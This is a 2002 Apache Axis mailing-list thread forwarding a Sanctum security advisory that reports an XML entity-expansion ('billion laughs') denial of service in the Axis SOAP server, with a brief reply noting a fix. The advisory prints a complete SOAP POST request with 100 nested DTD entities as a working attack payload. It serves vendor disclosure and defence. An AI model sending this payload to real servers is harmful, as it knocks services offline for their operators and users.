I think tom fixed it (http://marc.theaimsgroup.com/?l=axis-dev&m=103773176108393&w=2)
Thanks, dims --- Ted Leung <[EMAIL PROTECTED]> wrote: > This security alert came through today. > > Ted > ----- Original Message ----- > From: "Ian Holsman" <[EMAIL PROTECTED]> > To: <[EMAIL PROTECTED]> > Cc: "Ory Segal" <[EMAIL PROTECTED]> > Sent: Tuesday, November 26, 2002 8:02 AM > Subject: Security Alert - Apache/Axis > > > > Dear [EMAIL PROTECTED], > > > > During a recent security audit at one of our customers, Sanctum found a > > security vulnerability in your product Apache/Axis. > > The details of this vulnerability are described in the attached text file. > > > > We intend to issue a public advisory on BugTraq, SecuriTeam and other site > > forums about this vulnerability the last week of November. Please note, > the > > advisory will not contain specifics that might enable someone to exploit > the > > vulnerability. > > > > We would appreciate it if you could issue a patch in that timeline (i.e. > > around November 25th), so it can be linked to our advisory. > > > > Please feel free to contact me for more information/help. > > > > Thanks, > > -Amit > > > > <<XML_DTD_Axis.txt>> > > > > > > > ---------------------------------------------------------------------------- > ---- > > > > --------------------------------------------------------------------- > > To unsubscribe, e-mail: [EMAIL PROTECTED] > > For additional commands, e-mail: [EMAIL PROTECTED] > > /////////////////////////////////////////////////////////////////////// > ========================>> Security Advisory <<======================== > /////////////////////////////////////////////////////////////////////// > > > => Author: Amit Klein - Sanctum inc. http://www.sanctuminc.com/ > > => Release date: 14/Nov/2002 > > => Vendor: Apache Group > > The following product was found to be vulnerable: > > - Apache Axis SOAP server (checked with Xerces-J and Tomcat) > > The versions affected are the latest ones (as of October 2002). > > => Severity: High > > => CVE candidate: Not assigned yet. > > => Summary: Using the DTD part of the XML document, it is possible to cause the > XML parser to consume 100% CPU and/or a lot of memory, therefore resulting in > a denial of service condition. > > => Description: The DTD part of the XML document enables the document to define > named entities (other than the predefined <, >, etc.). The entities can be > defined using other entities (recursion is prohibited in XML 1.0). > Entities are expanded when they are referenced, inside the XML document. > The attack is comprised of defining and referencing an entity which is defined > using two instances of another entity, which is (in turn) defined as two instances > of yet another entity, and so on. This definition process can be repeated as long > as "necessary" - we found that nesting level of 100 is usually sufficient. > The 100th entity should be defined simply as a string. This has the effect of having > the first entity contain, in theory, 2^99 (two to the power of ninety nine) > concatenated values of the 100th entity. > Here's an example (the DTD is to be placed after the XML declaration, and before the > root element of the XML document): > > <!DOCTYPE root [ > <!ENTITY x100 "foobar"> > <!ENTITY x99 "&x100;&x100;"> > <!ENTITY x98 "&x99;&x99;"> > <!ENTITY x97 "&x98;&x98;"> > ... > <!ENTITY x3 "&x4;&x4;"> > <!ENTITY x2 "&x3;&x3;"> > <!ENTITY x1 "&x2;&x2;"> > ]> > > Referring to the first entity inside a document that would otherwise be accepted by > the application (using the syntax &x1;), results in a DoS condition, due to the > excessive CPU load and/or memory load required by the XML parser to expand this >entity. > > => Solution: Not available yet. > > => Workaround: Not available yet. > > => Example: > > Ory Segal from Sanctum devised a SOAP request that manages to mount this attack >requiring > only a path to an existing web service to be known to the attacker. > > The request is: > > POST path_to_web_service HTTP/1.0 > Host: ... > Content-Type: text/xml > SOAPAction: "" > Content-Length: 3224 > > <?xml version="1.0" ?> > <!DOCTYPE foobar [ > <!ENTITY x0 "hello"> > <!ENTITY x1 "&x0;&x0;"> > <!ENTITY x2 "&x1;&x1;"> > <!ENTITY x3 "&x2;&x2;"> > <!ENTITY x4 "&x3;&x3;"> > <!ENTITY x5 "&x4;&x4;"> > <!ENTITY x6 "&x5;&x5;"> > <!ENTITY x7 "&x6;&x6;"> > <!ENTITY x8 "&x7;&x7;"> > <!ENTITY x9 "&x8;&x8;"> > <!ENTITY x10 "&x9;&x9;"> > <!ENTITY x11 "&x10;&x10;"> > <!ENTITY x12 "&x11;&x11;"> > <!ENTITY x13 "&x12;&x12;"> > <!ENTITY x14 "&x13;&x13;"> > <!ENTITY x15 "&x14;&x14;"> > <!ENTITY x16 "&x15;&x15;"> > <!ENTITY x17 "&x16;&x16;"> > <!ENTITY x18 "&x17;&x17;"> > <!ENTITY x19 "&x18;&x18;"> > <!ENTITY x20 "&x19;&x19;"> > <!ENTITY x21 "&x20;&x20;"> > <!ENTITY x22 "&x21;&x21;"> > <!ENTITY x23 "&x22;&x22;"> > <!ENTITY x24 "&x23;&x23;"> > <!ENTITY x25 "&x24;&x24;"> > <!ENTITY x26 "&x25;&x25;"> > <!ENTITY x27 "&x26;&x26;"> > <!ENTITY x28 "&x27;&x27;"> > <!ENTITY x29 "&x28;&x28;"> > <!ENTITY x30 "&x29;&x29;"> > <!ENTITY x31 "&x30;&x30;"> > <!ENTITY x32 "&x31;&x31;"> > <!ENTITY x33 "&x32;&x32;"> > <!ENTITY x34 "&x33;&x33;"> > <!ENTITY x35 "&x34;&x34;"> > <!ENTITY x36 "&x35;&x35;"> > <!ENTITY x37 "&x36;&x36;"> > <!ENTITY x38 "&x37;&x37;"> > <!ENTITY x39 "&x38;&x38;"> > <!ENTITY x40 "&x39;&x39;"> > <!ENTITY x41 "&x40;&x40;"> > <!ENTITY x42 "&x41;&x41;"> > <!ENTITY x43 "&x42;&x42;"> > <!ENTITY x44 "&x43;&x43;"> > <!ENTITY x45 "&x44;&x44;"> > <!ENTITY x46 "&x45;&x45;"> > <!ENTITY x47 "&x46;&x46;"> > <!ENTITY x48 "&x47;&x47;"> > <!ENTITY x49 "&x48;&x48;"> > <!ENTITY x50 "&x49;&x49;"> > <!ENTITY x51 "&x50;&x50;"> > <!ENTITY x52 "&x51;&x51;"> > <!ENTITY x53 "&x52;&x52;"> > <!ENTITY x54 "&x53;&x53;"> > <!ENTITY x55 "&x54;&x54;"> > <!ENTITY x56 "&x55;&x55;"> > <!ENTITY x57 "&x56;&x56;"> > <!ENTITY x58 "&x57;&x57;"> > <!ENTITY x59 "&x58;&x58;"> > <!ENTITY x60 "&x59;&x59;"> > <!ENTITY x61 "&x60;&x60;"> > <!ENTITY x62 "&x61;&x61;"> > <!ENTITY x63 "&x62;&x62;"> > <!ENTITY x64 "&x63;&x63;"> > <!ENTITY x65 "&x64;&x64;"> > <!ENTITY x66 "&x65;&x65;"> > <!ENTITY x67 "&x66;&x66;"> > <!ENTITY x68 "&x67;&x67;"> > <!ENTITY x69 "&x68;&x68;"> > <!ENTITY x70 "&x69;&x69;"> > <!ENTITY x71 "&x70;&x70;"> > <!ENTITY x72 "&x71;&x71;"> > <!ENTITY x73 "&x72;&x72;"> > <!ENTITY x74 "&x73;&x73;"> > <!ENTITY x75 "&x74;&x74;"> > <!ENTITY x76 "&x75;&x75;"> > <!ENTITY x77 "&x76;&x76;"> > <!ENTITY x78 "&x77;&x77;"> > <!ENTITY x79 "&x78;&x78;"> > <!ENTITY x80 "&x79;&x79;"> > <!ENTITY x81 "&x80;&x80;"> > <!ENTITY x82 "&x81;&x81;"> > <!ENTITY x83 "&x82;&x82;"> > <!ENTITY x84 "&x83;&x83;"> > <!ENTITY x85 "&x84;&x84;"> > <!ENTITY x86 "&x85;&x85;"> > <!ENTITY x87 "&x86;&x86;"> > <!ENTITY x88 "&x87;&x87;"> > <!ENTITY x89 "&x88;&x88;"> > <!ENTITY x90 "&x89;&x89;"> > <!ENTITY x91 "&x90;&x90;"> > <!ENTITY x92 "&x91;&x91;"> > <!ENTITY x93 "&x92;&x92;"> > <!ENTITY x94 "&x93;&x93;"> > <!ENTITY x95 "&x94;&x94;"> > <!ENTITY x96 "&x95;&x95;"> > <!ENTITY x97 "&x96;&x96;"> > <!ENTITY x98 "&x97;&x97;"> > <!ENTITY x99 "&x98;&x98;"> > <!ENTITY x100 "&x99;&x99;"> > ]> > <SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/"; > xmlns:xsi="http://www.w3.org/1999/XMLSchema-instance"; > xmlns:xsd="http://www.w3.org/1999/XMLSchema";> > <SOAP-ENV:Body> > <ns1:aaa xmlns:ns1="urn:aaa" >SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/";> > <foobar xsi:type="xsd:string">&x100;</foobar> > </ns1:aaa> > </SOAP-ENV:Body> > </SOAP-ENV:Envelope> > > ===== Davanum Srinivas - http://xml.apache.org/~dims/ __________________________________________________ Do you Yahoo!? Yahoo! Mail Plus - Powerful. Affordable. Sign up now. http://mailplus.yahoo.com
